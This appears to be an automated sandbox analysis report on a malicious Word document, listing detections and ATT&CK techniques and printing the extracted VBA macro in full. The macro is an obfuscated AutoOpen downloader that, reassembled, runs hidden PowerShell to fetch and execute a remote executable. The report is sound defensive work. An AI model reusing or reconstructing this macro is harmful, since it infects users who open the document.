Verdict: MALICIOUS
Risk Score: 170

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
The sample is a malicious Office document containing a VBA macro. The macro uses obfuscated string concatenation to construct a URL and likely attempts to download and execute a second-stage payload. The presence of the AutoOpen macro and a Shell call further indicates malicious intent.
Heuristics (6)

- ClamAV: Doc.Macro.Obfuscation-6394109-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
  lzameffu = Array(yz5 & ifl3 & km & n8 & o & jq & E & ri0 & bfi & f & ow6 & hc0 & oq8 & wn & o0 & nw & orw & uf & n & pm & a0 & a & fp & vsy3 & uj & vy & usx & gb8 & u & ys0 & a4 & zx0 & y1 & pa0 & bo4 & nku & iqb & sji & ss8 & e8 & by & qde3 & dk0 & u4 & x & sa & y & adk & b4 & u6 & ne1 & Acc & utc1 & va & i6 & en8 & i & c1 & ypb & ve & ixp2 & dqu & mt & o5 & ukv & kfe3 & wy & ek3 & u2 & u0 & aw & emh0 & sce8 & zpy2 & d)(0)
  Shell lzameffu, cmywjaw
  End If
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  End Sub
  Sub AutoOpen()
  nkesji
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6084 bytes |

SHA-256 (macros.bas): acf56ed0ca1c1dda79ecc77378a9246d78aec5c46975c55511daf5792bcd3fc8
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub nkesji()
hc0 = Array(6966, 5493, 5081, 4201, "np^O", 3775, 916, 4934)(4)
by = Array("OwnL", 7903, 9500, 8650)(0)
x = Array(5624, 4993, 1066, 3039, 9011, "http", 6738)(5)
vsy3 = Array(4976, 2599, 259, "dO^W", 2873, 4238, 6177, 2003, 7601, 2818, 1925, 7575)(3)
bfi = Array(" -ex", 9257, 8985, 1457, 1167, 8884, 3556, 4061, 6859, 2251)(0)
va = Array(3365, 2807, 2747, 1057, 294, 7960, 5784, 6016, 2873, "/upl", 2750)(9)
i = Array(5753, "Aeb7", 1054, 934, 1466, 7529, 2641, 8037, 4300, 2310, 492)(1)
gb8 = Array(2481, 775, 4611, 4562, "IDdE", 875, 4632)(4)
ifl3 = Array("EXE ", 9708, 770, 791)(0)
ukv = Array("xE')", 2927, 2280, 2814, 3993, 6660, 1954, 6399)(0)
wn = Array(8757, 5845, " ", 7832, 8190, 1123, 1637, 3552, 2343)(2)
a4 = Array(7030, 6194, 8356, 1983, 6409, 8517, "^obj", 230, 3040, 1159)(6)
usx = Array(6284, 4040, 3207, 9468, " h", 2967, 8165)(4)
qde3 = Array(6954, 4438, "^oad", 1594, 8959)(2)
vy = Array(3517, "E^ ", 440, 1303, 6291, 4579, 7380, 8195, 2181, 199, 120, 9656)(1)
jq = Array(6528, 6291, 7884, 5649, 6320, 3021, 3324, 8175, "Hel^", 2189, 4127, 201)(8)
sji = Array(1934, 4627, 8467, 1323, 1494, 4569, 5165, 1926, 6006, "C^lI", 4919, 9303)(9)
u6 = Array("y.co", 9714, 858, 7514, 9891, 5874, 8598)(0)
o0 = Array(7530, 5250, 2339, 2578, 7484, "B^Yp", 6015, 5207, 2589, 365, 7036)(5)
u = Array(5726, "n (N", 9325, 4905, 2209, 5610, 8846, 5316, 5078, 1813, 3482, 4797, 2861, 189)(1)
iqb = Array(6102, 3941, 532, 1536, 9754, 7477, 3978, 5986, 9443, ".wEb", 9565, 6694, 8682, 8142)(9)
f = Array(7765, 1009, "E^cU", 9383, 7235)(2)
emh0 = Array(3675, "PPda", 772, 9492)(1)
n = Array(4886, 944, 4606, 510, 6946, "^roF")(5)
utc1 = Array(6653, 1720, "tent", 6876, 5599)(2)
ypb = Array(7619, 423, 5413, 1919, 2633, 5806, 8806, 7286, "BWT9", 1304, 3410, 7868)(8)
ow6 = Array(2124, 6969, "^TiO", 1634, 1110, 8326, 2702, 9895, 1883, 6664)(2)
kfe3 = Array(1555, 6036, 7984, 7165, 4550, 856, 5364, 6778, 7572, 2233, "^;st")(10)
ixp2 = Array(9630, 6181, 7669, "xe',", 7498, 8785, 6093, 3225, 600)(3)
ss8 = Array("^e^N", 9405, 1664, 5583, 6552)(0)
oq8 = Array(8397, 6516, 319, 8293, 8300, 6883, 5047, 2334, 3775, "liCy", 2728, 5105)(9)
u4 = Array(8312, 2726, 2992, 9806, 1685, 8552, 537, 7177, "LE('", 3900)(8)
zpy2 = Array(3613, 848, 8066, "eXe'", 5307, 1449, 245, 7349, 4532, 9401)(3)
e8 = Array("t).d", 9135, 6632, 9689, 459, 8026)(0)
uj = Array(9102, "styl", 6942, 564, 6724)(1)
ne1 = Array(9598, 2240, 3191, 5802, 1377, 9150, 7341, 2673, 3250, "m/wp", 3311)(9)
o5 = Array(5156, 6488, 8098, 9058, 8458, 5710, 8513, "a%.e")(7)
nw = Array("AS^s", 6563, 4107, 2112, 8100, 7560, 4355, 5720, 8399, 4789)(0)
adk = Array(3561, "rsfo", 7252, 7362, 276)(1)
n8 = Array(903, 2026, 186, 611, 2697, "p^OW")(5)
km = Array("/c """, 684, 5121, 1066, 4927, 2289, 8117, 1493, 4016, 436)(0)
i6 = Array(1664, 6804, "oads", 463, 2448, 3867, 9060, 5713, 6575, 1807, 6671)(2)
mt = Array("PDAT", 4480, 9139, 2505, 689)(0)
Acc = Array(811, 5579, 6717, 388, 2582, 5745, 4051, 7692, 7486, 5313, 4826, "-con", 5821, 4912)(11)
dqu = Array(8202, "'%aP", 4253, 2772, 4684, 368, 2259, 8441, 4002, 2069, 7611, 9455, 4413)(1)
dk0 = Array(9673, 6858, 2628, "^F^i", 9723, 8008, 531, 9224, 6659, 5765, 6318)(3)
aw = Array(6821, 2493, 3321, 1085, "^'%a", 8518, 4108, 124, 630)(4)
pm = Array(8381, 6710, 9040, 369, 8946, 4536, "^i^L", 9794, 2920, 6244, 4488, 3684, 6504, 6729)(6)
a0 = Array(5398, "^E ", 7021, 8415, 194, 1786, 7281, 6068, 7269, 2176, 5233)(1)
uf = Array(9525, 3974, 1807, "^nOp", 4693, 863)(3)
E = Array(9345, 5849, 2890, 530, 1910, "L.Ex", 9899, 2198, 2993)(5)
o = Array(1184, 6061, "^Ers", 7108)(2)
b4 = Array(7599, 2024, 6592, "rpla", 8336, 5105, 4856, 6203, 9137, 6059, 1638, 1396, 4100)(3)
zx0 = Array(1641, 6136, 4256, 2353, 9746, 1663, 8575, 2302, 4286, 9875, "eCt ", 6471)(10)
yz5 = Array(9178, 5834, 6693, 5891, "cmd.", 9539, 827, 4343, 7167, 7150, 6566, 1827, 2319, 6907)(4)
cmywjaw = 0
a = Array(" ^-", 5248, 621, 3711)(0)
wy = Array(5297, 6149, "ar^t", 8952, 2547, 4874, 5985, 1354)(2)
ys0 = Array(1501, "E^W-", 7474, 9570, 1486, 8804, 5297, 811, 3709, 7406)(1)
orw = Array(4567, 2854, 6864, 4832, 9791, " -", 8942, 5046, 5623, 6102, 289, 4354)(5)
ri0 = Array("^e ", 6244, 9197, 4361, 9469, 7372, 6450)(0)
u2 = Array(3920, 4620, 3141, 8115, "OceS", 7173, 8339, 4264, 6125, 887)(4)
ve = Array(4940, 9685, 316, "b7.e", 6889, 4858, 572, 6025, 1805, 6481)(3)
c1 = Array(9111, 9731, 7646, 4307, 5210, 1667, 3762, "X/qo", 6950)(7)
ek3 = Array("^-pR", 649, 5271, 2657)(0)
d = Array(1343, 7692, 319, 5767, """")(4)
nku = Array(7795, 2408, "^net", 401)(2)
en8 = Array(609, 7275, 7712, 4717, 9788, "/vel", 5195, 5479, 4021, 9454)(5)
y1 = Array(419, 5020, 3244, 4576, " ", 7273, 2990)(4)
y = Array(6715, 7863, 3821, 9508, "ette", 6112, 9345, 4501, 7078, 2384)(4)
sce8 = Array(1061, 4524, "tA%.", 6397)(2)
u0 = Array(4603, 349, 3024, 5324, 2150, 3574, 595, 4708, 9388, 2545, "s ")(10)
pa0 = Array(7106, 5926, "SySt", 453, 9902)(2)
sa = Array(8127, 6838, 8996, 8823, 247, "://l", 6938)(5)
fp = Array(6641, 9922, 9974, 8109, "w^IN", 5320, 6995, 6524, 5415, 8681, 3806, 1484, 5950, 5882)(4)
bo4 = Array(5912, 7045, 2542, "em^.", 6232, 2065, 5686)(3)
If VarType(ActiveDocument.MailMerge.State) = 3 Then
lzameffu = Array(yz5 & ifl3 & km & n8 & o & jq & E & ri0 & bfi & f & ow6 & hc0 & oq8 & wn & o0 & nw & orw & uf & n & pm & a0 & a & fp & vsy3 & uj & vy & usx & gb8 & u & ys0 & a4 & zx0 & y1 & pa0 & bo4 & nku & iqb & sji & ss8 & e8 & by & qde3 & dk0 & u4 & x & sa & y & adk & b4 & u6 & ne1 & Acc & utc1 & va & i6 & en8 & i & c1 & ypb & ve & ixp2 & dqu & mt & o5 & ukv & kfe3 & wy & ek3 & u2 & u0 & aw & emh0 & sce8 & zpy2 & d)(0)
Shell lzameffu, cmywjaw
End If
End Sub
Sub AutoOpen()
nkesji
End Sub